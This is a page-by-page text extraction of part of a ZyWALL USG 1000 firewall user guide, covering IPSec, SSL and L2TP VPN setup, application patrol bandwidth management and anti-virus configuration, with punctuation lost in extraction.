Page 448: ... bulb icon is lit when the entry is active and dimmed when the entry is inactive The connect icon is lit when the interface is connected and dimmed when it is disconnected Name This field displays the name of the IPSec SA VPN Gateway This field displays the associated VPN gateway s If there is no VPN gateway this field displays manual key Encapsulation This field displays what encapsulation the IP...

Page 449: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 449 Figure 323 Configuration VPN IPSec VPN VPN Connection Edit IKE ...

Page 450: ...BIOS packets to pass through IPSec SAs in order to allow local computers to find computers on the remote network and vice versa VPN Gateway Application Scenario Select the scenario that best describes your intended VPN connection Site to site Choose this if the remote IPSec router has a static IP address or a domain name This ZyWALL can initiate the VPN tunnel Site to site with Dynamic Peer Choose...

Page 451: ...e Protocol Select which protocol you want to use in the IPSec SA Choices are AH RFC 2402 provides integrity authentication sequence integrity replay resistance and non repudiation but not encryption If you select AH you must select an Authentication algorithm ESP RFC 2406 provides encryption and the same services offered by AH but its authentication is weaker If you select ESP you must select an E...

Page 452: ...SHA1 and MD5 SHA1 is generally considered stronger than MD5 but it is also slower The ZyWALL and the remote IPSec router must both have a proposal that uses the same authentication algorithm Perfect Forward Secrecy PFS Select whether or not you want to enable Perfect Forward Secrecy PFS and if you do which Diffie Hellman key group to use for encryption Choices are none disable PFS DH1 enable PFS a...

Page 453: ...st and Last IP Address in the Remote Policy Select this to have the ZyWALL check the connection to the first and last IP addresses in the connection s remote policy Make sure one of these is the peer gateway s LAN IP address Log Select this to have the ZyWALL generate a log every time it checks this VPN connection Inbound Outbound traffic NAT Outbound Traffic Source NAT This translation hides the ...

Page 454: ...click this to delete it Move To change an entry s position in the numbered list select it and click Move to display a field to type a number for where you want to put that entry and press ENTER to move the entry to the number that you typed This field is a sequential value and it is not associated with a specific NAT record However the order of records is the sequence in which conditions are check...

Page 455: ... either the Add icon or an existing manual key entry s Edit icon In the VPN Gateway section of the screen select Manual Key Note Only use manual key as a temporary solution because it is not as secure as a regular IPSec SA Figure 324 Configuration VPN IPSec VPN VPN Connection Add Manual Key This table describes labels specific to manual key configuration See Section 25 2 on page 446 for descriptio...

Page 456: ...ot encryption If you select AH you must select an Authentication Algorithm ESP RFC 2406 provides encryption and the same services offered by AH but its authentication is weaker If you select ESP you must select an Encryption Algorithm and Authentication Algorithm The ZyWALL and remote IPSec router must use the same protocol Encryption Algorithm This field is applicable when the Active Protocol is ...

Page 457: ...r 1234567890XYZ for a DES encryption key the ZyWALL only uses 12345678 The ZyWALL still stores the longer key Authentication Key Enter the authentication key which depends on the authentication algorithm MD5 type a unique key 16 20 characters long SHA1 type a unique key 20 characters long You can use any alphanumeric characters or _ If you want to enter the key in hexadecimal type 0x at the beginn...

Page 458: ...t to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Object References Select an entry and click Object References to open a screen that shows which settings us...

Page 459: ...policy or edit an existing one To access this screen go to the VPN Gateway summary screen see Section 25 3 on page 458 and click either the Add icon or an Edit icon Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 122 Configuration VPN IPSec VPN VPN Gateway continued LABEL DESCRIPTION ...

Page 460: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 460 Figure 326 Configuration VPN IPSec VPN VPN Gateway Edit ...

Page 461: ...ress or the IP address corresponding to the domain name 0 0 0 0 is invalid Peer Gateway Address Select how the IP address of the remote IPSec router in the IKE SA is defined Select Static Address to enter the domain name or the IP address of the remote IPSec router You can provide a second IP address or domain name for the ZyWALL to try if it cannot establish an IKE SA with the first one Fall back...

Page 462: ...IKE SA Then select the certificate the ZyWALL uses to identify itself to the remote IPsec router This certificate is one of the certificates in My Certificates If this certificate is self signed import it into the remote IPsec router If this certificate is signed by a CA the remote IPsec router must trust that CA Note The IPSec routers must trust each other s certificates The ZyWALL uses one of it...

Page 463: ...ers including spaces although trailing spaces are truncated This value is only used for identification and can be any string E mail the ZyWALL is identified by an e mail address you can use up to 31 ASCII characters including spaces although trailing spaces are truncated This value is only used for identification and can be any string Peer ID Type Select which type of identification is used to ide...

Page 464: ...ect alternative name field see the note at the end of this description DNS subject alternative name field E mail subject alternative name field Subject Name subject name maximum 255 ASCII characters including spaces Note If Peer ID Type is IP please read the rest of this section If you type 0 0 0 0 the ZyWALL uses the IP address specified in the Secure Gateway Address field This is not recommended...

Page 465: ...DES encryption algorithm AES128 a 128 bit key with the AES encryption algorithm AES192 a 192 bit key with the AES encryption algorithm AES256 a 256 bit key with the AES encryption algorithm The ZyWALL and the remote IPSec router must use the same key size and encryption algorithm Longer keys require more processing power resulting in increased latency and decreased throughput Authentication Select...

Page 466: ...unnel for example use extended authentication to enforce a user name and password check This way even though they all know the VPN tunnel s security settings each still has to provide a unique user name and password Enable Extended Authentication Select this if one of the routers the ZyWALL or the remote IPSec router verifies a user name and password from the other router using the local user data...

Page 467: ...lidate the policy routes in each spoke router depending on the IP addresses and subnets of each spoke However a VPN concentrator is not for every situation The hub router is a single failure point so a VPN concentrator is not as appropriate if the connection between spoke routers cannot be down occasionally maintenance for example There is also more burden on the hub router It receives VPN traffic...

Page 468: ... IPSec VPN Concentrator Example This IPSec VPN concentrator example uses the following settings Branch Office A ZyNOS based ZyWALL VPN Gateway VPN Tunnel 1 My Address 10 0 0 2 Peer Gateway Address 10 0 0 1 VPN Connection VPN Tunnel 1 Local Policy 192 168 11 0 255 255 255 0 Remote Policy 192 168 1 0 255 255 255 0 Disable Policy Enforcement Policy Route Source 192 168 11 0 Destination 192 168 12 0 N...

Page 469: ...forcement Concentrator Add VPN tunnel 1 and VPN tunnel 2 to an IPSec VPN concentrator Firewall Block traffic from VPN tunnel 2 from accessing the LAN Branch Office B USG ZyWALL or ZyWALL 1050 VPN Gateway VPN Tunnel 2 My Address 10 0 0 3 Peer Gateway Address 10 0 0 1 VPN Connection VPN Tunnel 2 Local Policy 192 168 12 0 255 255 255 0 Remote Policy 192 168 1 0 255 255 255 0 Disable Policy Enforcemen...

Page 470: ...The VPN Concentrator summary screen displays the VPN concentrators in the ZyWALL To access this screen click Configuration VPN IPSec VPN Concentrator The following screen appears Figure 329 Configuration VPN IPSec VPN Concentrator Each field is discussed in the following table See Section 25 4 3 on page 470 for more information 25 4 3 The VPN Concentrator Add Edit Screen The VPN Concentrator Add E...

Page 471: ... the first character cannot be a number This value is case sensitive Member Select the concentrator s IPSec VPN connection policies Note You must disable policy enforcement in each member See Section 25 2 1 on page 448 IPSec VPN connection policies that do not belong to a VPN concentrator appear under Available Select any VPN connection policies that you want to add to the VPN concentrator and cli...

Page 472: ... IP address or a domain name for either or both IP addresses Sometimes your ZyWALL might offer another alternative such as using the IP address of a port or interface as well You can also specify the IP address of the remote IPSec router as 0 0 0 0 This means that the remote IPSec router can have any IP address In this case only the remote IPSec router can initiate an IKE SA because the ZyWALL doe...

Page 473: ...th of DES Advanced Encryption Standard AES is a newer method of data encryption that also uses a secret key AES applies a 128 bit key to 128 bit blocks of data It is faster than 3DES Some ZyWALLs also offer stronger forms of AES that apply 192 bit or 256 bit keys to 128 bit blocks of data In most ZyWALLs you can select one of the following authentication algorithms for each proposal The algorithms...

Page 474: ...her in steps 5 and 6 as illustrated below The identities are also encrypted using the encryption algorithm and encryption key the ZyWALL and remote IPSec router selected in previous steps Figure 333 IKE SA Main Negotiation Mode Steps 5 6 Authentication continued You have to create and distribute a pre shared key The ZyWALL and remote IPSec router use it in the authentication process though it is n...

Page 475: ...page 475 the ZyWALL and the remote IPSec router authenticate each other successfully In contrast in Table 127 on page 475 the ZyWALL and the remote IPSec router cannot authenticate each other and therefore cannot establish an IKE SA It is also possible to configure the ZyWALL to ignore the identity of the remote IPSec router In this case you usually set the peer ID type to Any This is less secure ...

Page 476: ...st aggressive mode only takes three steps to establish an IKE SA Aggressive mode does not provide as much security because the identity of the ZyWALL and the identity of the remote IPSec router are not encrypted It is usually used in remote access situations where the address of the initiator is not known by the responder and both parties want to use pre shared keys for authentication For example ...

Page 477: ... same VPN tunnel to connect to a single IPSec router For example this might be used with telecommuters In extended authentication one of the routers the ZyWALL or the remote IPSec router provides a user name and password to the other router which uses a local user database and or an external server to verify the user name and password If the user name or password is wrong the routers do not establ...

Page 478: ... to the remote IPSec router may be called the remote policy Active Protocol The active protocol controls the format of each packet It also specifies how much of each packet is protected by the encryption and authentication algorithms IPSec VPN includes two active protocols AH Authentication Header RFC 2402 and ESP Encapsulating Security Payload RFC 2406 Note The ZyWALL and remote IPSec router must...

Page 479: ...and Perfect Forward Secrecy An IPSec SA proposal is similar to an IKE SA proposal see IKE SA Proposal on page 472 except that you also have the choice whether or not the ZyWALL and remote IPSec router perform a new DH key exchange every time an IPSec SA is established This is called Perfect Forward Secrecy PFS If you enable PFS the ZyWALL and remote IPSec router perform a DH key exchange every tim...

Page 480: ...y several proposals There is no DH key exchange so you have to provide the encryption key and the authentication key the ZyWALL and remote IPSec router use Note The ZyWALL and remote IPSec router must use the same encryption key and authentication key Authentication and the Security Parameter Index SPI For authentication the ZyWALL and remote IPSec router use the SPI instead of pre shared keys ID ...

Page 481: ...twork B If you do not configure it the remote IPSec router may not route messages for computer M through the IPSec SA because computer M s IP address is not part of its local policy To set up this NAT you have to specify the following information Source the original source address most likely computer M s network Destination the original destination address the remote network B SNAT the translated...

Page 482: ... this kind of NAT The ZyWALL checks these rules similar to the way it checks rules for a firewall The first part of these rules define the conditions in which the rule apply Original IP the original destination address the remote network B Protocol the protocol TCP UDP or both used by the service requesting the connection Original Port the original destination port or range of destination ports in...

Page 483: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 483 ...

Page 484: ...Chapter 25 IPSec VPN ZyWALL USG 1000 User s Guide 484 ...

Page 485: ...vice on your network for full tunnel mode access enter access messages or upload a custom logo to be displayed on the remote user screen 26 1 2 What You Need to Know There are two SSL VPN network access modes reverse proxy and full tunnel Reverse Proxy Mode In reverse proxy mode the ZyWALL is a proxy that acts on behalf of the local network servers such as your web and mail servers As the final de...

Page 486: ...twork Access Mode Full Tunnel Mode SSL Access Policy An SSL access policy allows the ZyWALL to perform the following tasks apply Endpoint Security EPS checking to require users computers to comply with defined corporate policies before they can access the SSL VPN tunnel limit user access to specific applications or files on the network allow user access to specific networks assign private IP addre...

Page 487: ... Accounts User Account User Group Configure a user account or user group to which you want to apply this SSL access policy Endpoint Security Endpoint Security Endpoint Security EPS checking makes sure users computers comply with defined corporate policies before they can access the SSL VPN tunnel Application SSL Application Configure an SSL application object to specify the type of application and...

Page 488: ... it and click Activate Inactivate To turn off an entry select it and click Inactivate Move To move an entry to a different number in the list click the Move icon In the field that appears specify the number to which you want to move the interface Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for...

Page 489: ...Chapter 26 SSL VPN ZyWALL USG 1000 User s Guide 489 Apply Click Apply to save the settings Reset Click Reset to discard all changes Table 129 VPN SSL VPN Access Privilege LABEL DESCRIPTION ...

Page 490: ...G 1000 User s Guide 490 26 2 1 The SSL Access Policy Add Edit Screen To create a new or edit an existing SSL access policy click the Add or Edit icon in the Access Privilege screen Figure 340 VPN SSL VPN Access Privilege Add Edit ...

Page 491: ...se fields to make sure users computers meet an endpoint security object s Operating System OS and security requirements before granting access Enable EPS Checking Select this to have the ZyWALL check that users computers meet the Operating System OS and security requirements of one of the SSL access policy s selected endpoint security objects before granting access Periodical checking time Select ...

Page 492: ... applications as defined by the selected SSL application settings and the remote user computers are not made to be a part of the local network Assign IP Pool Define a separate pool of IP addresses to assign to the SSL users Select it here The SSL VPN IP pool cannot overlap with IP addresses on the ZyWALL s local networks LAN and DMZ for example the SSL user s network or the networks you specify in...

Page 493: ...PN Login Domain Name SSL VPN Login Domain Name 1 2 Specify a domain name for users to use for SSL VPN login The domain name must be registered to one of the ZyWALL s IP addresses or be one of the ZyWALL s DDNS entries You can specify up to two domain names so you could use one domain name for each of two WAN ports Do not include the host For example www zyxel com is a fully qualified domain name w...

Page 494: ...eb browser on the remote user computer The ZyXEL company logo is the default logo Specify the location and file name of the logo graphic or click Browse to locate it Note The logo graphic must be GIF JPG or PNG format The graphic should use a resolution of 127 x 57 pixels to avoid distortion when displayed The ZyWALL automatically resizes a graphic of a different resolution to 127 x 57 pixels The ...

Page 495: ...4 Establishing an SSL VPN Connection After you have configured the SSL VPN settings on the ZyWALL use the ZyWALL login screen s SSL VPN button to establish an SSL VPN connection See Section 27 2 on page 500 for details 1 Display the ZyWALL s login screen and enter your user account information the user name and password Click SSL VPN Figure 343 Login Screen ...

Page 496: ...hould see the client portal screen The following shows an example Figure 344 SSL VPN Client Portal Screen Example If the user account is not set up for SSL VPN access an SSL VPN connection is not activated message displays in the Login screen Clear the Login to SSL VPN check box and try logging in again For more information on user portal screens refer to Chapter 27 on page 499 ...

Page 497: ...Chapter 26 SSL VPN ZyWALL USG 1000 User s Guide 497 ...

Page 498: ...Chapter 26 SSL VPN ZyWALL USG 1000 User s Guide 498 ...

Page 499: ...ok Web Access OWA Network Resource Access Methods As a remote user you can access resources on the local network using one of the following methods Using a supported web browser Once you have successfully logged in through the ZyWALL you can access intranet sites web based applications or web based e mails using one of the supported web browsers Using the ZyWALL SecuExtender client Once you have s...

Page 500: ...and access network resources the domain name or IP address of the ZyWALL the login account user name and password if also required the user name and or password to access the network resource Certificates The remote user s computer establishes an HTTPS connection to the ZyWALL to access the login screen If instructed by your network administrator you must install or import a certificate provided b...

Page 501: ... the Address in a Web Browser 2 Click OK or Yes if a security screen displays Figure 347 Login Security Screen 3 A login screen displays Enter the user name and password of your login account If a token password is also required enter it in the One Time Password field 4 Click SSL VPN to log in and establish an SSL VPN connection to the network to access network resources Figure 348 Login Screen ...

Page 502: ...et a message about needing Java download and install it and restart your browser and re login If a certificate warning screen displays click OK Yes or Continue Figure 349 Java Needed Message 6 The ZyWALL tries to install the SecuExtender client As shown next you may have to click some pop ups to get your browser to allow the installation Figure 350 ActiveX Object Installation Blocked by Browser ...

Page 503: ...Internet Explorer click Install Figure 351 SecuExtender Blocked by Internet Explorer 8 The ZyWALL tries to run the ssltun application You may need to click something to get your browser to allow this In Internet Explorer click Run Figure 352 SecuExtender Progress 9 Click Next to use the setup wizard to install the SecuExtender client on your computer Figure 353 SecuExtender Progress ...

Page 504: ...o finish installing the SecuExtender client on your computer Figure 354 Hardware Installation Warning 11 The Application screen displays showing the list of resources available to you See Figure 355 on page 505 for a screen example Note Available resource links vary depending on the configuration your network administrator made ...

Page 505: ...o to the Application or File Sharing screen 2 Click this icon to create a bookmark to the SSL VPN user screen in your web browser 3 Click this icon to display the on line help window 4 Click this icon to log out and terminate the secure connection 5 Select your preferred language for the interface 6 This part of the screen displays a list of the resources available to you In the Application screen...

Page 506: ... user screen click the Add to Favorite icon 2 A screen displays Accept the default name in the Name field or enter a descriptive name to identify this link 3 Click OK to create a bookmark in your web browser Figure 356 Add Favorite 27 5 Logging Out of the SSL VPN User Screens To properly terminate a connection click on the Logout icon in any remote user screen 1 Click the Logout icon in any remote...

Page 507: ...apter 27 SSL User Screens ZyWALL USG 1000 User s Guide 507 3 An information screen displays to indicate that the SSL VPN connection is about to terminate Figure 358 Logout Connection Termination Progress ...

Page 508: ...Chapter 27 SSL User Screens ZyWALL USG 1000 User s Guide 508 ...

Page 509: ...an access depends on the ZyWALL s configuration 28 2 The Application Screen Click the Application tab to display the screen The Name field displays the descriptive name for an application The Type field displays wether the application is a web site Web Server or web based e mail using Microsoft Outlook Web Access OWA To access a web based application simply click a link in the Application screen t...

Page 510: ...Chapter 28 SSL User Application Screens ZyWALL USG 1000 User s Guide 510 ...

Page 511: ...splay and access shared files folders on a file server You can also perform the following actions Access a folder Open a file if your web browser cannot open the file you are prompted to download it Save a file to your computer Create a new folder Rename a file or folder Delete a file or folder Upload a file Note Available actions you can perform in the File Sharing screen vary depending on the ri...

Page 512: ...shared folder s available The following figure shows an example with one file share Figure 360 File Sharing 29 3 Opening a File or Folder You can open a file if the file extension is recognized by the web browser and the associated application is installed on your computer 1 Log in as a remote user and click the File Sharing tab 2 Click on a file share icon ...

Page 513: ...G 1000 User s Guide 513 3 If an access user name and password are required a screen displays as shown in the following figure Enter the account information and click Login to continue Figure 361 File Sharing Enter Access User Name and Password ...

Page 514: ...lick a folder to access it For this example click on a doc file to open the Word document Figure 362 File Sharing Open a Word File 29 3 1 Downloading a File You are prompted to download a file which cannot be opened using a web browser Follow the on screen instructions to download and save the file to your computer Then launch the associated application to open the file ...

Page 515: ... the on screen instructions Figure 363 File Sharing Save a Word File 29 4 Creating a New Folder To create a new folder in the file share location click the New Folder icon Specify a descriptive name for the folder You can enter up to 356 characters Then click Add Note Make sure the length of the folder name does not exceed the maximum allowed on the file server Figure 364 File Sharing Save a Word ...

Page 516: ...ndow displays Specify the new name and or file extension in the field provided You can enter up to 356 characters Then click Apply Note Make sure the length of the name does not exceed the maximum allowed on the file server You may not be able to open a file if you change the file extension Figure 366 File Sharing Rename 29 6 Deleting a File or Folder Click the Delete icon next to a file or folder...

Page 517: ...ify the location and or name of the file you want to upload Or click Browse to locate it 3 Click Upload to send the file to the file server 4 After the file is uploaded successfully you should see the name of the file and a message in the screen Figure 367 File Sharing File Upload Note Uploading a file with the same name and file extension replaces the existing file on the file server No warning m...

Page 518: ...Chapter 29 SSL User File Sharing ZyWALL USG 1000 User s Guide 518 ...

Page 519: ...lications must be installed on your computer For example to use the VNC remote desktop program you must have the VNC client installed on your computer 30 1 The ZyWALL SecuExtender Icon The ZyWALL SecuExtender icon color indicates the SSL VPN tunnel s connection status Figure 368 ZyWALL SecuExtender Icon Red the SSL VPN tunnel is not connected You cannot connect to the SSL application and network r...

Page 520: ...e SSL VPN connection DNS Domain Name System maps a domain name to its corresponding IP address and vice versa The DNS server is extremely important because without it you must know the IP address of a computer before you can access it Your computer uses the DNS server specified here to resolve domain names for resources you access through the SSL VPN connection WINS Server 1 2 These are the IP add...

Page 521: ...DESCRIPTION 2009 03 12 13 35 50 SecuExtender Agent DETAIL Build Datetime Feb 24 2009 10 25 07 2009 03 12 13 35 50 SecuExtender Agent DEBUG rasphone pbk C Documents and Settings 11746 rasphone pbk 2009 03 12 13 35 50 SecuExtender Agent DEBUG SecuExtender log C Documents and Settings 11746 SecuExtender log 2009 03 12 13 35 50 SecuExtender Agent DETAIL Check Parameters 2009 03 12 13 35 50 SecuExtende...

Page 522: ...d select Stop Connection to disconnect the SSL VPN tunnel 30 6 Uninstalling the ZyWALL SecuExtender Do the following if you need to remove the ZyWALL SecuExtender 1 Click start All Programs ZyXEL ZyWALL SecuExtender Uninstall 2 In the confirmation screen click Yes Figure 371 Uninstalling the ZyWALL SecuExtender Confirmation 3 Windows uninstalls the ZyWALL SecuExtender Figure 372 ZyWALL SecuExtende...

Page 523: ...reen see Section 31 2 on page 525 to configure the ZyWALL s L2TP VPN settings 31 1 2 What You Need to Know The Layer 2 Tunneling Protocol L2TP works at layer 2 the data link layer to tunnel network traffic between two peers over another network like the Internet In L2TP VPN an IPSec VPN tunnel is established first and then an L2TP tunnel is built inside it See Chapter 25 on page 443 for informatio...

Page 524: ...address object in the local policy For the Remote Policy create an address object that uses host type and an IP address of 0 0 0 0 Use this address object in the remote policy You must also edit the Default_L2TP_VPN_GW gateway entry Configure the My Address setting according to your requirements Replace the default Pre Shared Key Policy Route You must configure a policy route to let remote users a...

Page 525: ...settings Note Disconnect any existing L2TP VPN sessions before modifying L2TP VPN settings The remote users must make any needed matching configuration changes and re establish the sessions using the new settings Figure 375 Configuration VPN L2TP VPN The following table describes the fields in this screen Table 134 Configuration VPN IPSec VPN VPN Connection LABEL DESCRIPTION Create new Object Use ...

Page 526: ...or user group that can use the L2TP VPN tunnel Use Create new Object if you need to configure a new user account see Section 40 2 1 on page 702 for details Otherwise select any to allow any user with a valid account and password on the ZyWALL to log in Keep Alive Timer The ZyWALL sends a Hello message after waiting this long without receiving any traffic from the remote user The ZyWALL disconnects...

Page 527: ... VoIP call sound quality 32 1 1 What You Can Do in this Chapter Use the General summary screen see Section 32 2 on page 537 to enable and disable application patrol Use the Common Instant Messenger Peer to Peer VoIP and Streaming see Section 32 3 on page 538 screens to look at the applications the ZyWALL can recognize and review the settings for each one You can also enable and disable the rules f...

Page 528: ...chedule user source and destination information Your custom policies take priority over the policy s default settings Classification of Applications There are two ways the ZyWALL can identify the application The first is called auto The ZyWALL looks at the IP payload OSI level 7 inspection and attempts to match it with known patterns for specific applications Usually this occurs at the beginning o...

Page 529: ... for every flow In addition applications do not have to request a particular service or give advanced notice of where the traffic is going Use application patrol to set a DSCP value for an application s traffic that the ZyWALL sends out Bandwidth Management When you allow an application you can restrict the bandwidth it uses or even the bandwidth that particular features in the application like vo...

Page 530: ...ore sending the traffic out a LAN zone interface Figure 376 LAN to WAN Connection and Packet Directions Outbound and Inbound Bandwidth Limits You can limit an application s outbound or inbound bandwidth This limit keeps the traffic from using up too much of the out going interface s bandwidth This way you can make sure there is bandwidth for other applications When you apply a bandwidth limit to o...

Page 531: ...e lowest priority Maximize Bandwidth Usage Maximize bandwidth usage allows applications with maximize bandwidth usage enabled to borrow any unused bandwidth on the out going interface After each application gets its configured bandwidth rate the ZyWALL uses the fairness based scheduler to divide any unused bandwidth on the out going interface amongst applications that need more bandwidth and have ...

Page 532: ...s for server B Maximize Bandwidth Usage Effect With maximize bandwidth usage enabled after each server gets its configured rate the rest of the available bandwidth is divided equally between the two So server A gets its configured rate of 300 kbps and server B gets its configured rate of 200 kbps Then the ZyWALL divides the remaining bandwidth 1000 500 500 equally between the two 500 2 250 kbps fo...

Page 533: ...for a description of DSCP marking 32 1 3 Application Patrol Bandwidth Management Examples Bandwidth management is very useful when applications are competing for limited bandwidth For example say you have a WAN zone interface connected to an ADSL device with a 8 Mbps downstream and 1 Mbps upstream ADSL connection The following sections give some simplified examples of using application patrol poli...

Page 534: ... 32 1 3 2 SIP Any to WAN Bandwidth Management Example Manage SIP traffic going to the WAN zone from a VIP user on the LAN or DMZ Outbound traffic to the WAN from the LAN and DMZ is limited to 200 kbps The ZyWALL applies this limit before sending the traffic to the WAN Inbound traffic to the LAN and DMZ from the WAN is also limited to 200 kbps The ZyWALL applies this limit before sending the traffi...

Page 535: ...WAN to Any instead of Any to WAN 32 1 3 4 HTTP Any to WAN Bandwidth Management Example Inbound traffic gets more bandwidth as the local users will probably download more than they upload and the ADSL connection supports this Second highest priority 2 Set policies for other applications except SIP to lower priorities so the local users HTTP traffic gets sent before non SIP traffic Enable maximize b...

Page 536: ... you do not want to give FTP more bandwidth Figure 382 FTP WAN to DMZ Bandwidth Management Example 32 1 3 6 FTP LAN to DMZ Bandwidth Management Example The LAN and DMZ zone interfaces are connected to Ethernet networks not an ADSL device so you limit both outbound and inbound traffic to 50 Mbps Fourth highest priority 4 Disable maximize bandwidth usage since you do not want to give FTP more bandwi...

Page 537: ...e 384 Configuration App Patrol General The following table describes the labels in this screen See Section 32 3 1 on page 539 for more information as well Table 139 Configuration App Patrol General LABEL DESCRIPTION Enable Application Patrol Select this check box to turn on application patrol Enable BWM This is a global setting for enabling or disabling bandwidth management on the ZyWALL You must ...

Page 538: ...ion Status This field displays whether a service is activated Licensed or not Not Licensed or expired Expired Registration Type This field displays whether you applied for a trial application Trial or registered a service with your iCard s PIN number Standard None displays when the service is not activated Apply new Registration This link appears if you have not registered for the service or only ...

Page 539: ...IPTION Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate This field is a sequential value and it is not associated with a specific application Status The activate light bulb icon is lit when the entry is active and ...

Page 540: ...is field displays the name of the application Classification Specify how the ZyWALL should identify this application Choices are Auto the ZyWALL identifies this application by matching the IP payload with the application s pattern s Service Ports the ZyWALL identifies this application by looking at the destination port in the IP header Service Port This is available if the Classification is Servic...

Page 541: ...Status The activate light bulb icon is lit when the entry is active and dimmed when the entry is inactive This field is a sequential value and it is not associated with a specific condition Note The ZyWALL checks conditions in the order they appear in the list While this sequence does not affect the functionality you might improve the performance of the ZyWALL by putting more common conditions at ...

Page 542: ...ds show the amount of bandwidth the application s traffic that matches the policy can use These fields only apply when Access is set to forward In This is how much inbound bandwidth in kilobits per second this policy allows the application to use Inbound refers to the traffic the ZyWALL sends to a connection s initiator If no displays here this policy does not apply bandwidth management for the ap...

Page 543: ... instant messenger service Figure 387 Application Policy Edit The following table describes the labels in this screen OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving your changes Table 141 Application Edit continued LABEL DESCRIPTION Table 142 Application Policy Edit LABEL DESCRIPTION Create new Object Use to configure any new settings obj...

Page 544: ...effective for every destination Access This field controls what the ZyWALL does with packets for this application that match this policy Choices are forward the ZyWALL routes the packets for this application Drop the ZyWALL does not route the packets for this application and does not notify the client of its decision Reject the ZyWALL does not route the packets for this application and notifies th...

Page 545: ...o the traffic the ZyWALL sends to a connection s initiator If you enter 0 here this policy does not apply bandwidth management for the application s traffic that the ZyWALL sends to the initiator Traffic with bandwidth management disabled inbound and outbound are both set to 0 is automatically treated as the lowest priority 7 If the sum of the bandwidths for routes using the same next hop is highe...

Page 546: ... gives traffic of an application with higher priority bandwidth before traffic of an application with lower priority The ZyWALL uses a fairness based round robin scheduler to divide bandwidth between applications with the same priority The number in this field is ignored if the incoming and outgoing limits are both set to 0 In this case the traffic is automatically treated as being set to the lowe...

Page 547: ...entry to the number that you typed Status The activate light bulb icon is lit when the entry is active and dimmed when the entry is inactive This field is a sequential value and it is not associated with a specific condition Note The ZyWALL checks conditions in the order they appear in the list While this sequence does not affect the functionality you might improve the performance of the ZyWALL by...

Page 548: ...or Assured Forwarding The number following the af identifies one of four classes and one of three drop preferences See Assured Forwarding AF PHB for DiffServ on page 359 for more details BWM These fields show the amount of bandwidth the traffic can use These fields only apply when Access is set to forward In This is how much inbound bandwidth in kilobits per second this policy allows the matching ...

Page 549: ...he ZyWALL generate a log log log and alert log alert or neither no when traffic matches this policy See Chapter 51 on page 845 for more on logs Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 143 AppPatrol Other continued LABEL DESCRIPTION Table 144 AppPatrol Other Edit LABEL DESCRIPTION Create new Object Use to conf...

Page 550: ...TCP and UDP Select any to apply the policy to both TCP and UDP traffic Access This field controls what the ZyWALL does with packets that match this policy Choices are forward the ZyWALL routes the packets Drop the ZyWALL does not route the packets and does not notify the client of its decision Reject the ZyWALL does not route the packets and notifies the client of its decision DSCP Marking Set how...

Page 551: ...ty traffic uses all of the actual bandwidth Priority This field displays when the inbound or outbound bandwidth management is not set to 0 Enter a number between 1 and 7 to set the priority for traffic that matches this policy The smaller the number the higher the priority Traffic with a higher priority is given bandwidth before traffic with a lower priority The ZyWALL uses a fairness based round ...

Page 552: ...on Patrol ZyWALL USG 1000 User s Guide 552 OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving your changes Table 144 AppPatrol Other Edit continued LABEL DESCRIPTION ...

Page 553: ...es two interfaces to the LAN zone Figure 390 ZyWALL Anti Virus Example 33 1 1 What You Can Do in this Chapter Use the General screens Section 33 2 on page 556 to turn anti virus on or off set up anti virus policies and check the anti virus engine type and the anti virus license and signature status Use the Black White List screen Section 33 3 on page 561 to set up anti virus black blocked and whit...

Page 554: ...self The effect of a virus attack varies from doing so little damage that you are unaware your computer is infected to wiping out the entire contents of a hard drive to rendering your computer inoperable ZyWALL Anti Virus Scanner The ZyWALL has a built in signature database Setting up the ZyWALL between your local network and the Internet allows the ZyWALL to scan files transmitting through the en...

Page 555: ...can detect polymorphic viruses 2 When a virus is detected an alert message is displayed in Microsoft Windows computers Refer to Appendix C on page 981 if your Windows computer does not display the alert messages 3 Changes to the ZyWALL s anti virus settings affect new sessions not the sessions that already existed before you applied the changed settings 4 The ZyWALL does not scan the following fil...

Page 556: ...age 265 for how to register for the anti virus service You may need to customize the zones in the Network Zone used for the anti virus scanning direction 33 2 Anti Virus Summary Screen Click Configuration Anti X Anti Virus to display the configuration screen as shown next Figure 391 Configuration Anti X Anti Virus General ...

Page 557: ...ble ASCII characters X5O P AP 4 PZX54 P 7CC 7 EICAR STANDARD ANTIVIRUS TEST FILE H H Policies Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Select an entry and click this to be able to modify it Remove Select an entry and click this to delete it Activate To turn on an entry select it and click Activate Inactivate To turn off ...

Page 558: ...lick this link to go to the screen where you can register for the service Signature Information The following fields display information on the current signature set that the ZyWALL is using Anti Virus Engine Type This field displays whether the ZyWALL is set to use ZyXEL s anti virus engine or the one powered by Kaspersky Upgrading the ZyWALL to firmware version 2 11 and updating the anti virus s...

Page 559: ...e Select this check box to have the ZyWALL apply this anti virus policy to check traffic for viruses From To Select source and destination zones for traffic to scan for viruses The anti virus policy has the ZyWALL scan traffic coming from the From zone and going to the To zone Protocols to Scan Select which protocols of traffic to scan for viruses HTTP applies to traffic using TCP ports 80 8080 an...

Page 560: ...ature s log Create a log on the ZyWALL when a packet matches a signature s log alert An alert is an e mailed log for more serious events that may need more immediate attention Select this option to have the ZyWALL send an alert when a packet matches a signature s White List Black List Checking Check White List Select this check box to check files against the white list Check Black List Select this...

Page 561: ...word encryption Select this check box to have the ZyWALL delete any ZIP files that it is not able to unzip The ZyWALL cannot unzip password protected ZIP files or a ZIP file within another ZIP file There are also limits to the number of ZIP files that the ZyWALL can concurrently unzip Note The ZyWALL s firmware package cannot go through the ZyWALL with this option enabled The ZyWALL classifies the...

